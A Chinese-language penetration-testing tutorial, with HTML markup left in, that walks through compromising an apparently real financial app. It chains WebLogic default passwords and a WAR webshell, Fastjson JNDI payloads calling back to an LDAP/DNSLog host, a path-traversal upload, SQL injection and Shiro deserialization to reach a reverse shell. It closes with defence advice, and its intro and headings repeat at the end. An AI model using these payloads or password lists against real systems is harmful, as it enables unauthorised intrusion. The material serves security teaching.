WebLogic渗透测试实战教学文档<\/h1>

前言<\/h2>
本教学文档基于一次真实的金融类App渗透测试案例，详细记录了从WebLogic弱口令到最终获取系统权限的全过程。文档涵盖了WebLogic、Fastjson、Shiro等多个组件的漏洞利用方法，适合中高级安全研究人员学习参考。<\/p>

1. WebLogic弱口令利用<\/h2>

1.1 识别WebLogic服务<\/h3>

通过App通信请求发现7002端口<\/li>
访问\/console<\/code>路径确认WebLogic管理界面<\/li>

确认版本：10.3.6.0<\/li>
<\/ul>
1.2 弱口令尝试<\/h3>

常用组合尝试：

weblogic\/weblogic123（成功）<\/li>
weblogic\/weblogic<\/li>
weblogic\/Oracle123<\/li>
system\/Password1<\/li>
<\/ul>
<\/li>
注意：10.3.6.0版本的jar包可能未生效，不要依赖特定漏洞利用包<\/li>
<\/ul>
2. 通过WebLogic后台获取Shell<\/h2>
2.1 部署War包<\/h3>

登录WebLogic管理后台<\/li>
导航至"部署"页面<\/li>
上传预制的War格式WebShell<\/li>
完成部署并访问对应URL<\/li>
<\/ol>
2.2 替代方法<\/h3>

使用WebLogic已知漏洞直接获取Shell（如CVE-2020-14882等）<\/li>
通过反序列化漏洞直接执行命令<\/li>
<\/ul>
3. Fastjson远程命令执行<\/h2>
3.1 发现Fastjson漏洞<\/h3>

在站点lib目录发现fastjson 1.1.39版本<\/li>
存在debug测试页面，增加利用可能性<\/li>
<\/ul>
3.2 漏洞利用尝试<\/h3>
1.2.47版本payload失败<\/strong>：<\/p>
{
<\/span><\/span>  "a"<\/span>: {
<\/span><\/span>    "@type"<\/span>: "java.lang.Class"<\/span>,
<\/span><\/span>    "val"<\/span>: "com.sun.rowset.JdbcRowSetImpl"<\/span>
<\/span><\/span>  },
<\/span><\/span>  "b"<\/span>: {
<\/span><\/span>    "@type"<\/span>: "com.sun.rowset.JdbcRowSetImpl"<\/span>,
<\/span><\/span>    "dataSourceName"<\/span>: "ldap:\/\/dnslog"<\/span>,
<\/span><\/span>    "autoCommit"<\/span>: true<\/span>
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>1.2.45版本payload成功<\/strong>：<\/p>
{
<\/span><\/span>  "@type"<\/span>: "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory"<\/span>,
<\/span><\/span>  "properties"<\/span>: {
<\/span><\/span>    "data_source"<\/span>: "ldap:\/\/dnslog"<\/span>
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3.3 利用要点<\/h3>

不同版本Fastjson需要尝试不同payload<\/li>
准备DNSLog或LDAP服务接收回调<\/li>
可结合JNDI注入工具实现RCE<\/li>
<\/ul>
4. 任意文件上传漏洞<\/h2>
4.1 发现漏洞<\/h3>

找到文件上传接口：\/file\/upload.do<\/code><\/li>
代码审计发现无任何过滤措施<\/li>
<\/ul>
4.2 利用限制<\/h3>

文件被上传到临时目录\/temp<\/code><\/li>
无法直接访问，需要结合其他漏洞利用<\/li>
<\/ul>
4.3 绕过思路<\/h3>

尝试路径遍历：..\/..\/webapps\/ROOT\/<\/code><\/li>
结合文件包含漏洞<\/li>
利用竞争条件在文件删除前访问<\/li>
<\/ul>
5. 后台弱口令漏洞<\/h2>
5.1 信息收集<\/h3>

从WebLogic部署信息获取第二个站点上下文<\/li>
访问后为登录页面<\/li>
<\/ul>
5.2 数据库信息利用<\/h3>

从配置文件中获取数据库连接信息<\/li>
尝试连接但发现数据加密<\/li>
在Oracle目录下找到历史SQL文件<\/li>
<\/ol>
5.3 弱口令破解<\/h3>

发现admin用户<\/li>
MD5解密得到密码：admin123<\/li>
其他常见密码组合：

admin\/admin<\/li>
admin\/123456<\/li>
admin\/password<\/li>
<\/ul>
<\/li>
<\/ul>
6. SQL注入漏洞<\/h2>
6.1 漏洞发现<\/h3>

后台搜索功能存在注入<\/li>
测试payload：'<\/code>引发错误<\/li>
<\/ul>
6.2 利用方法<\/h3>

使用常规SQL注入技术：

联合查询<\/li>
布尔盲注<\/li>
时间盲注<\/li>
<\/ul>
<\/li>
工具推荐：sqlmap<\/li>
<\/ul>
7. Shiro反序列化命令执行<\/h2>
7.1 环境分析<\/h3>

lib目录发现低版本Shiro<\/li>
使用默认密钥<\/li>
commons-beanutils版本为1.8.3<\/li>
<\/ul>
7.2 利用挑战<\/h3>

标准ysoserial工具链不兼容：

CommonsBeanutils1依赖commons-beanutils 1.9.2<\/li>
与目标环境1.8.3版本不匹配<\/li>
<\/ul>
<\/li>
<\/ul>
7.3 解决方案<\/h3>

修改ysoserial源码：

将commons-beanutils依赖改为1.8.3<\/li>
重新编译打包<\/li>
<\/ul>
<\/li>
使用CommonsBeanutils1链生成payload<\/li>
通过Shiro的rememberMe功能发送恶意cookie<\/li>
<\/ol>
7.4 成功利用<\/h3>

获取反弹shell<\/li>
权限提升至系统权限<\/li>
<\/ul>
8. 总结与防御建议<\/h2>
8.1 渗透测试要点总结<\/h3>

不要忽视基本漏洞（如弱口令）<\/li>
组件版本信息至关重要<\/li>
工具可能需要针对环境定制<\/li>
多个漏洞组合利用可提高成功率<\/li>
<\/ol>
8.2 防御建议<\/h3>
WebLogic<\/strong>：<\/p>

修改默认密码<\/li>
及时安装补丁<\/li>
限制管理界面访问<\/li>
<\/ul>
Fastjson<\/strong>：<\/p>

升级到最新安全版本<\/li>
使用安全模式<\/li>
<\/ul>
Shiro<\/strong>：<\/p>

使用随机密钥而非默认密钥<\/li>
升级到修复版本<\/li>
<\/ul>
通用防御<\/strong>：<\/p>

输入验证和过滤<\/li>
最小权限原则<\/li>
定期安全审计<\/li>
<\/ul>
9. 工具与资源<\/h2>


WebLogic利用工具：<\/p>

WeblogicScanner<\/li>
CVE-2020-14882利用脚本<\/li>
<\/ul>
<\/li>

Fastjson利用工具：<\/p>

fastjson_tool<\/li>
JNDI注入工具<\/li>
<\/ul>
<\/li>

Shiro利用工具：<\/p>

shiro_attack<\/li>
修改版ysoserial<\/li>
<\/ul>
<\/li>

其他：<\/p>

sqlmap<\/li>
Burp Suite<\/li>
DNSLog平台<\/li>
<\/ul>
<\/li>
<\/ol>
附录：常见问题解答<\/h2>
Q: 为什么1.2.47的Fastjson payload不工作而1.2.45的可以？

A: 不同版本Fastjson对payload的解析和黑名单实现不同，需要针对目标版本尝试不同payload。<\/p>
Q: 如何确定Shiro的密钥？

A: 可以通过以下方式：<\/p>

源代码审计<\/li>
配置文件查找<\/li>
使用shiro_attack等工具爆破常见密钥<\/li>
<\/ol>
Q: 文件上传到临时目录如何利用？

A: 可能的利用方式：<\/p>

结合文件包含漏洞<\/li>
竞争条件利用<\/li>
配合其他漏洞如路径遍历<\/li>
<\/ol>

WebLogic渗透测试实战教学文档<\/h1>

前言<\/h2> 本教学文档基于一次真实的金融类App渗透测试案例，详细记录了从WebLogic弱口令到最终获取系统权限的全过程。文档涵盖了WebLogic、Fastjson、Shiro等多个组件的漏洞利用方法，适合中高级安全研究人员学习参考。<\/p>

1. WebLogic弱口令利用<\/h2>

2. 通过WebLogic后台获取Shell<\/h2>

3. Fastjson远程命令执行<\/h2>

4. 任意文件上传漏洞<\/h2>

5. 后台弱口令漏洞<\/h2>

6. SQL注入漏洞<\/h2>

7. Shiro反序列化命令执行<\/h2>

8. 总结与防御建议<\/h2>

前言<\/h2>
本教学文档基于一次真实的金融类App渗透测试案例，详细记录了从WebLogic弱口令到最终获取系统权限的全过程。文档涵盖了WebLogic、Fastjson、Shiro等多个组件的漏洞利用方法，适合中高级安全研究人员学习参考。<\/p>